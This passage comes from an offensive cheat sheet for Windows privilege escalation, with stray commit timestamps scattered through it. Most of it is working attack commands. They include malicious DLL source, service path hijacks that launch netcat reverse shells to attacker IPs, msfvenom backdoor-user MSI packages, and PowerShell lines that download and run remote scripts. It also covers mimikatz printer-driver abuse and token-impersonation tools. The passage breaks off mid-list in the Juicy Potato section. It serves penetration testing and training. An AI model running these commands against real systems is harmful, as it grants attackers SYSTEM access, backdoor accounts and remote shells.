2021-05-06 16:26:00 +00:00
* List installed programs
```powershell
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
```
2018-12-25 14:19:45 +00:00
2021-05-06 16:26:00 +00:00
* List services
```powershell
net start
wmic service list brief
tasklist /SVC
```
2018-12-25 14:19:45 +00:00
2021-05-06 16:26:00 +00:00
* Enumerate scheduled tasks
```powershell
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
```
2018-12-25 14:19:45 +00:00
2021-05-06 16:26:00 +00:00
* Startup tasks
```powershell
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
```
2018-12-25 14:19:45 +00:00
2019-03-03 19:01:25 +00:00
## EoP - Incorrect permissions in services
2018-12-25 14:19:45 +00:00
2019-03-03 19:01:25 +00:00
> A service running as Administrator/SYSTEM with incorrect file permissions might allow EoP. You can replace the binary, restart the service and get system.
2018-05-20 20:10:33 +00:00
2019-03-03 19:01:25 +00:00
Often, services are pointing to writeable locations:
- Orphaned installs, not installed anymore but still exist in startup
- DLL Hijacking
2020-02-01 21:12:36 +00:00
```powershell
# find missing DLL
- Find-PathDLLHijack PowerUp.ps1
- Process Monitor : check for "Name Not Found"
# compile a malicious dll
- For x64 compile with: "x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll"
- For x86 compile with: "i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll"
# content of windows_dll.c
#include < windows.h >
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt");
ExitProcess(0);
}
return TRUE;
}
```
2019-03-03 19:01:25 +00:00
- PATH directories with weak permissions
2021-05-06 16:26:00 +00:00
```powershell
$ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
$ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
$ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
FOR /F %i in (Servicenames.txt) DO echo %i
type Servicenames.txt
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
```
2018-05-20 20:10:33 +00:00
2019-03-03 19:01:25 +00:00
Alternatively you can use the Metasploit exploit : `exploit/windows/local/service_permissions`
Note to check file permissions you can use `cacls` and `icacls`
> icacls (Windows Vista +)
> cacls (Windows XP)
You are looking for `BUILTIN\Users:(F)` (Full access), `BUILTIN\Users:(M)` (Modify access) or `BUILTIN\Users:(W)` (Write-only access) in the output.
2019-11-11 19:31:07 +00:00
### Example with Windows 10 - CVE-2019-1322 UsoSvc
Prerequisite: Service account
```powershell
PS C:\Windows\system32> sc.exe stop UsoSvc
PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"
PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe"
2022-05-25 07:55:05 +00:00
PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd /C C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
2019-11-11 19:31:07 +00:00
PS C:\Windows\system32> sc.exe qc usosvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: usosvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
PS C:\Windows\system32> sc.exe start UsoSvc
```
### Example with Windows XP SP1 - upnphost
2019-03-03 19:01:25 +00:00
```powershell
2019-05-25 16:19:08 +00:00
# NOTE: spaces are mandatory for this exploit to work !
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
2019-03-03 19:01:25 +00:00
sc qc upnphost
2019-05-25 16:19:08 +00:00
sc config upnphost depend= ""
net start upnphost
2019-03-03 19:01:25 +00:00
```
If it fails because of a missing dependency, try the following commands.
```powershell
sc config SSDPSRV start=auto
net start SSDPSRV
net stop upnphost
net start upnphost
sc config upnphost depend=""
```
2019-08-28 23:08:26 +00:00
Using [`accesschk` ](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe ) from Sysinternals or [accesschk-XP.exe - github.com/phackt ](https://github.com/phackt/pentest/blob/master/privesc/windows/accesschk-XP.exe )
2019-03-03 19:01:25 +00:00
```powershell
$ accesschk.exe -uwcqv "Authenticated Users" * /accepteula
RW SSDPSRV
SERVICE_ALL_ACCESS
RW upnphost
SERVICE_ALL_ACCESS
$ accesschk.exe -ucqv upnphost
upnphost
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
RW NT AUTHORITY\Authenticated Users
SERVICE_ALL_ACCESS
RW BUILTIN\Power Users
SERVICE_ALL_ACCESS
$ sc config < vuln-service > binpath="net user backdoor backdoor123 /add"
$ sc config < vuln-service > binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
$ sc stop < vuln-service >
$ sc start < vuln-service >
$ sc config < vuln-service > binpath="net localgroup Administrators backdoor /add"
$ sc stop < vuln-service >
$ sc start < vuln-service >
```
## EoP - Windows Subsystem for Linux (WSL)
2018-08-12 21:30:22 +00:00
2018-12-22 23:45:45 +00:00
Technique borrowed from [Warlockobama's tweet ](https://twitter.com/Warlockobama/status/1067890915753132032 )
2018-05-20 20:10:33 +00:00
2018-12-22 23:45:45 +00:00
> With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ <distro>.exe --default-user root. Now start your bind shell or reverse.
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
2018-12-22 23:45:45 +00:00
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
2018-05-20 20:10:33 +00:00
```
2019-01-20 15:41:46 +00:00
Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe`
Alternatively you can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\`
2019-03-03 19:01:25 +00:00
## EoP - Unquoted Service Paths
2018-12-25 14:19:45 +00:00
The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first.
```powershell
2019-03-03 19:01:25 +00:00
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
2018-12-25 14:19:45 +00:00
2019-10-06 18:59:58 +00:00
wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """
2018-12-25 14:19:45 +00:00
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
```
2020-08-09 10:15:56 +00:00
* Metasploit exploit : `exploit/windows/local/trusted_service_path`
* PowerUp exploit
```powershell
# find the vulnerable application
C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"
...
[*] Checking for unquoted service paths...
ServiceName : BBSvc
Path : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'BBSvc' -Path < HijackPath >
...
# automatic exploit
Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe"
```
2019-03-03 19:01:25 +00:00
### Example
For `C:\Program Files\something\legit.exe` , Windows will try the following paths first:
- `C:\Program.exe`
- `C:\Program Files.exe`
2021-07-26 19:25:56 +00:00
## EoP - $PATH Interception
Requirements:
- PATH contains a writeable folder with low privileges.
- The writeable folder is _before_ the folder that contains the legitimate binary.
EXAMPLE:
```powershell
# List contents of the PATH environment variable
# EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32
$env:Path
# See permissions of the target folder
# EXAMPLE OUTPUT: BUILTIN\Users: GR,GW
icacls.exe "C:\Program Files\nodejs\"
# Place our evil-file in that folder.
copy evil-file.exe "C:\Program Files\nodejs\cmd.exe"
```
Because (in this example) "C:\Program Files\nodejs\" is _before_ "C:\WINDOWS\system32\" on the PATH variable, the next time the user runs "cmd.exe", our evil version in the nodejs folder will run, instead of the legitimate one in the system32 folder.
2020-02-01 21:12:36 +00:00
## EoP - Named Pipes
1. Find named pipes: `[System.IO.Directory]::GetFiles("\\.\pipe\")`
2. Check named pipes DACL: `pipesec.exe <named_pipe>`
3. Reverse engineering software
4. Send data throught the named pipe : `program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe`
2019-03-03 19:01:25 +00:00
## EoP - Kernel Exploitation
2018-12-25 14:51:11 +00:00
List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits ](https://github.com/SecWiki/windows-kernel-exploits )
##### #Security Bulletin #KB #Description #Operating System
2019-01-20 15:41:46 +00:00
- [MS17-017 ](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-017 ) [KB4013081] [GDI Palette Objects Local Privilege Escalation] (windows 7/8)
- [CVE-2017-8464 ](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-8464 ) [LNK Remote Code Execution Vulnerability] (windows 10/8.1/7/2016/2010/2008)
- [CVE-2017-0213 ](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213 ) [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008)
- [CVE-2018-0833 ](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-0833 ) [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)
- [CVE-2018-8120 ](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120 ) [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)
- [MS17-010 ](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-010 ) [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP)
- [MS16-135 ](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-135 ) [KB3199135] [Windows Kernel Mode Drivers] (2016)
- [MS16-111 ](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-111 ) [KB3186973] [kernel api] (Windows 10 10586 (32/64)/8.1)
- [MS16-098 ](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098 ) [KB3178466] [Kernel Driver] (Win 8.1)
- [MS16-075 ](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075 ) [KB3164038] [Hot Potato] (2003/2008/7/8/2012)
- [MS16-034 ](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034 ) [KB3143145] [Kernel Driver] (2008/7/8/10/2012)
- [MS16-032 ](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032 ) [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012)
- [MS16-016 ](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-016 ) [KB3136041] [WebDAV] (2008/Vista/7)
- [MS16-014 ](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-014 ) [K3134228] [remote code execution] (2008/Vista/7)
2018-12-25 14:51:11 +00:00
...
- [MS03-026 ](./MS03-026 ) [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)
2019-03-24 15:00:27 +00:00
To cross compile a program from Kali, use the following command.
```powershell
Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c
```
2019-03-04 18:40:34 +00:00
## EoP - AlwaysInstallElevated
2019-03-03 19:01:25 +00:00
Check if these registry values are set to "1".
2021-05-06 16:26:00 +00:00
```powershell
2019-03-03 19:01:25 +00:00
$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
2021-03-24 21:26:23 +00:00
$ Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer
$ Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer
2019-03-03 19:01:25 +00:00
```
Then create an MSI package and install it.
```powershell
$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
2021-03-24 21:26:23 +00:00
$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi-nouac -o evil.msi
2019-03-03 19:01:25 +00:00
$ msiexec /quiet /qn /i C:\evil.msi
```
2021-03-24 21:26:23 +00:00
Technique also available in :
* Metasploit : `exploit/windows/local/always_install_elevated`
* PowerUp.ps1 : `Get-RegistryAlwaysInstallElevated` , `Write-UserAddMSI`
2019-03-03 19:01:25 +00:00
## EoP - Insecure GUI apps
Application running as SYSTEM allowing an user to spawn a CMD, or browse directories.
2018-12-25 14:51:11 +00:00
2019-03-03 19:01:25 +00:00
Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"
2020-05-28 09:19:16 +00:00
## EoP - Evaluating Vulnerable Drivers
Look for vuln drivers loaded, we often don't spend enough time looking at this:
```powershell
2020-07-13 13:00:36 +00:00
# https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery
2020-05-28 09:19:16 +00:00
2020-07-13 13:00:36 +00:00
PS C:\Users\Swissky> driverquery.exe /fo table
2020-05-28 09:19:16 +00:00
Module Name Display Name Driver Type Link Date
============ ====================== ============= ======================
1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM
3ware 3ware Kernel 5/18/2015 6:28:03 PM
ACPI Microsoft ACPI Driver Kernel 12/9/1975 6:17:08 AM
AcpiDev ACPI Devices driver Kernel 12/7/1993 6:22:19 AM
acpiex Microsoft ACPIEx Drive Kernel 3/1/2087 8:53:50 AM
acpipagr ACPI Processor Aggrega Kernel 1/24/2081 8:36:36 AM
AcpiPmi ACPI Power Meter Drive Kernel 11/19/2006 9:20:15 PM
acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM
ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM
< SNIP >
2020-07-13 13:00:36 +00:00
PS C:\Users\Swissky> DriverQuery.exe --no-msft
[+] Enumerating driver services...
[+] Checking file signatures...
Citrix USB Filter Driver
Service Name: ctxusbm
Path: C:\Windows\system32\DRIVERS\ctxusbm.sys
Version: 14.11.0.138
Creation Time (UTC): 17/05/2018 01:20:50
Cert Issuer: CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=Symantec Corporation, C=US
Signer: CN="Citrix Systems, Inc.", OU=XenApp(ClientSHA256), O="Citrix Systems, Inc.", L=Fort Lauderdale, S=Florida, C=US
< SNIP >
2020-05-28 09:19:16 +00:00
```
2021-08-10 21:00:19 +00:00
## EoP - Printers
### Universal Printer
Create a Printer
```ps1
$printerName = 'Universal Priv Printer'
$system32 = $env:systemroot + '\system32'
$drivers = $system32 + '\spool\drivers'
$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName
Copy-Item -Force -Path ($system32 + '\mscms.dll') -Destination ($system32 + '\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll' -Destination ($drivers + '\x64\3\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers + '\W32X86\3\mimispool.dll')
Add-PrinterDriver -Name 'Generic / Text Only'
Add-Printer -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared
New-Item -Path ($RegStartPrinter + '\CopyFiles') | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Kiwi') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Directory' -PropertyType 'String' -Value 'x64\3' | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String' -Value 'W32X86\3' | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Mango') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Directory' -PropertyType 'String' -Value $null | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Files' -PropertyType 'MultiString' -Value $null | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Module' -PropertyType 'String' -Value 'mimispool.dll' | Out-Null
```
Execute the driver
```ps1
$serverName = 'dc.purple.lab'
$printerName = 'Universal Priv Printer'
$fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'})
Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
Add-Printer -ConnectionName $fullprinterName
```
2021-09-06 18:58:44 +00:00
### PrinterNightmare
```ps1
git clone https://github.com/Flangvik/DeployPrinterNightmare
PS C:\adversary> FakePrinter.exe 32mimispool.dll 64mimispool.dll EasySystemShell
[< 3 ] @Flangvik - TrustedSec
[+] Copying C:\Windows\system32\mscms.dll to C:\Windows\system32\6cfbaf26f4c64131896df8a522546e9c.dll
[+] Copying 64mimispool.dll to C:\Windows\system32\spool\drivers\x64\3\6cfbaf26f4c64131896df8a522546e9c.dll
[+] Copying 32mimispool.dll to C:\Windows\system32\spool\drivers\W32X86\3\6cfbaf26f4c64131896df8a522546e9c.dll
[+] Adding printer driver => Generic / Text Only!
[+] Adding printer => EasySystemShell!
[+] Setting 64-bit Registry key
[+] Setting 32-bit Registry key
[+] Setting '*' Registry key
```
```ps1
PS C:\target> $serverName = 'printer-installed-host'
PS C:\target> $printerName = 'EasySystemShell'
PS C:\target> $fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'})
PS C:\target> Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
PS C:\target> Add-Printer -ConnectionName $fullprinterName
```
2021-08-10 21:00:19 +00:00
### Bring Your Own Vulnerability
Concealed Position : https://github.com/jacob-baines/concealed_position
* ACIDDAMAGE - [CVE-2021-35449 ](https://nvd.nist.gov/vuln/detail/CVE-2021-35449 ) - Lexmark Universal Print Driver LPE
* RADIANTDAMAGE - [CVE-2021-38085 ](https://nvd.nist.gov/vuln/detail/CVE-2021-38085 ) - Canon TR150 Print Driver LPE
* POISONDAMAGE - [CVE-2019-19363 ](https://nvd.nist.gov/vuln/detail/CVE-2019-19363 ) - Ricoh PCL6 Print Driver LPE
* SLASHINGDAMAGE - [CVE-2020-1300 ](https://nvd.nist.gov/vuln/detail/CVE-2020-1300 ) - Windows Print Spooler LPE
```powershell
cp_server.exe -e ACIDDAMAGE
# Get-Printer
# Set the "Advanced Sharing Settings" -> "Turn off password protected sharing"
cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE
cp_client.exe -l -e ACIDDAMAGE
```
2019-03-03 19:01:25 +00:00
## EoP - Runas
2018-12-25 14:51:11 +00:00
2019-01-20 15:41:46 +00:00
Use the `cmdkey` to list the stored credentials on the machine.
2018-12-25 14:19:45 +00:00
2019-01-20 15:41:46 +00:00
```powershell
cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
```
Then you can use `runas` with the `/savecred` options in order to use the saved credentials.
The following example is calling a remote binary via an SMB share.
```powershell
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
2021-04-21 20:27:07 +00:00
runas /savecred /user:Administrator "cmd.exe /k whoami"
2019-01-20 15:41:46 +00:00
```
2018-12-25 14:19:45 +00:00
2019-03-03 19:01:25 +00:00
Using `runas` with a provided set of credential.
```powershell
C:\Windows\System32\runas.exe /env /noprofile /user:< username > < password > "c:\users\Public\nc.exe -nc < attacker-ip > 4444 -e cmd.exe"
```
```powershell
2020-03-22 19:25:35 +00:00
$secpasswd = ConvertTo-SecureString "< password > " -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("< user > ", $secpasswd)
$computer = "< hostname > "
2019-03-03 19:01:25 +00:00
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","< attacker_ip > 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
```
2020-05-03 14:28:17 +00:00
## EoP - Abusing Shadow Copies
If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation.
```powershell
# List shadow copies using vssadmin (Needs Admnistrator Access)
vssadmin list shadows
# List shadow copies using diskshadow
diskshadow list shadows all
# Make a symlink to the shadow copy and access it
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
```
2019-07-25 12:08:32 +00:00
## EoP - From local administrator to NT SYSTEM
```powershell
PsExec.exe -i -s cmd.exe
```
2019-07-22 19:45:50 +00:00
## EoP - Living Off The Land Binaries and Scripts
Living Off The Land Binaries and Scripts (and also Libraries) : https://lolbas-project.github.io/
> The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques.
A LOLBin/Lib/Script must:
* Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft.
Have extra "unexpected" functionality. It is not interesting to document intended use cases.
Exceptions are application whitelisting bypasses
* Have functionality that would be useful to an APT or red team
```powershell
wmic.exe process call create calc
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Microsoft.Workflow.Compiler.exe tests.xml results.xml
```
2019-07-26 13:29:34 +00:00
## EoP - Impersonation Privileges
2019-05-25 16:19:08 +00:00
2019-12-11 15:59:14 +00:00
Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary below will only list direct ways to exploit the privilege to obtain an admin session or read sensitive files.
| Privilege | Impact | Tool | Execution path | Remarks |
| --- | --- | --- | --- | --- |
|`SeAssignPrimaryToken`| ** *Admin*** | 3rd party tool | *"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"* | Thank you [Aurélien Chalot ](https://twitter.com/Defte_ ) for the update. I will try to re-phrase it to something more recipe-like soon. |
|`SeBackup`| **Threat** | ** *Built-in commands*** | Read sensitve files with `robocopy /b` |- May be more interesting if you can read %WINDIR%\MEMORY.DMP< br > < br > - `SeBackupPrivilege` (and robocopy) is not helpful when it comes to open files.< br > < br > - Robocopy requires both SeBackup and SeRestore to work with /b parameter. |
|`SeCreateToken`| ** *Admin*** | 3rd party tool | Create arbitrary token including local admin rights with `NtCreateToken` . ||
|`SeDebug`| ** *Admin*** | **PowerShell** | Duplicate the `lsass.exe` token. | Script to be found at [FuzzySecurity ](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1 ) |
2021-07-25 09:40:19 +00:00
|`SeLoadDriver`| ** *Admin*** | 3rd party tool | 1. Load buggy kernel driver such as `szkg64.sys` or `capcom.sys` < br > 2. Exploit the driver vulnerability< br > < br > Alternatively, the privilege may be used to unload security-related drivers with `ftlMC` builtin command. i.e.: `fltMC sysmondrv` | 1. The `szkg64` vulnerability is listed as [CVE-2018-15732 ](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732 )< br > 2. The `szkg64` [exploit code ](https://www.greyhathacker.net/?p=1025 ) was created by [Parvez Anwar ](https://twitter.com/parvezghh ) |
2019-12-11 15:59:14 +00:00
|`SeRestore`| ** *Admin*** | **PowerShell** | 1. Launch PowerShell/ISE with the SeRestore privilege present.< br > 2. Enable the privilege with [Enable-SeRestorePrivilege ](https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1 )).< br > 3. Rename utilman.exe to utilman.old< br > 4. Rename cmd.exe to utilman.exe< br > 5. Lock the console and press Win+U| Attack may be detected by some AV software.< br > < br > Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
|`SeTakeOwnership`| ** *Admin*** | ** *Built-in commands*** |1. `takeown.exe /f "%windir%\system32"` < br > 2. `icalcs.exe "%windir%\system32" /grant "%username%":F` < br > 3. Rename cmd.exe to utilman.exe< br > 4. Lock the console and press Win+U| Attack may be detected by some AV software.< br > < br > Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
|`SeTcb`| ** *Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.< br > < br > To be verified. ||
2020-05-03 14:28:17 +00:00
### Restore A Service Account's Privileges
> This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only.
```powershell
# https://github.com/itm4n/FullPowers
c:\TOOLS>FullPowers
[+] Started dummy thread with id 9976
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeAuditPrivilege Generate security audits Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z
```
2019-08-15 16:21:06 +00:00
### Meterpreter getsystem and alternatives
```powershell
meterpreter> getsystem
Tokenvator.exe getsystem cmd.exe
incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe
psexec -s -i cmd.exe
python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc
```
2019-07-26 13:29:34 +00:00
### RottenPotato (Token Impersonation)
2019-05-25 16:19:08 +00:00
2021-08-10 21:00:19 +00:00
* Binary available at : https://github.com/foxglovesec/RottenPotato
* Binary available at : https://github.com/breenmachine/RottenPotatoNG
2019-05-25 16:19:08 +00:00
```c
getuid
getprivs
use incognito
list\_tokens -u
cd c:\temp\
execute -Hc -f ./rot.exe
impersonate\_token "NT AUTHORITY\SYSTEM"
```
```powershell
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
```
2019-07-26 13:29:34 +00:00
2021-08-10 21:00:19 +00:00
### Juicy Potato (Abusing the golden privileges)
2019-07-26 13:29:34 +00:00
2021-08-10 21:00:19 +00:00
> If the machine is **>= Windows 10 1809 & Windows Server 2019** - Try **Rogue Potato**
> If the machine is **< Windows 10 1809 < Windows Server 2019** - Try **Juicy Potato**
* Binary available at : https://github.com/ohpe/juicy-potato/releases
2019-07-26 13:29:34 +00:00
1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication)
```powershell
whoami /priv
```
2. Select a CLSID based on your Windows version, a CLSID is a globally unique identifier that identifies a COM class object
* [Windows 7 Enterprise ](https://ohpe.it/juicy-potato/CLSID/Windows_7_Enterprise )
